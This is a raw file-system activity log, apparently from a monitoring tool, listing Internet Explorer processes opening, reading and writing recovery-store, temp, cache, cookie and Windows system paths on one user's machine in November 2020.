11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.981Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.981Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:45.981Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:45.981Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:45.981Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:45.981Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.981Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:45.981Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:45.981Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:45.981Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:45.981Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:45.981Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:45.981Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\en\IEXPLORE.EXE.mui
11/3/2020 - 11:45:45.981Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:45.981Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:45.981Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:45.981Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:45.981Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Prefetch\IEXPLORE.EXE-4B6C9213.pf
11/3/2020 - 11:45:46.43Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Prefetch\IEXPLORE.EXE-4B6C9213.pfIEXPLORE.EXE-4B6C9213.pf
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exe\Device\HarddiskVolume2
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\$EXTEND
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\$EXTEND
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\$EXTEND
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DOMStore
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DOMStore
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DOMStore
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DOMStore\O7SUU5RP
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DOMStore\O7SUU5RP
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DOMStore\O7SUU5RP
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DOMStore\SM4GL60W
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DOMStore\SM4GL60W
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DOMStore\SM4GL60W
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Globalization
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Globalization
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Globalization
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService\AppData
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService\AppData
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService\AppData
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot
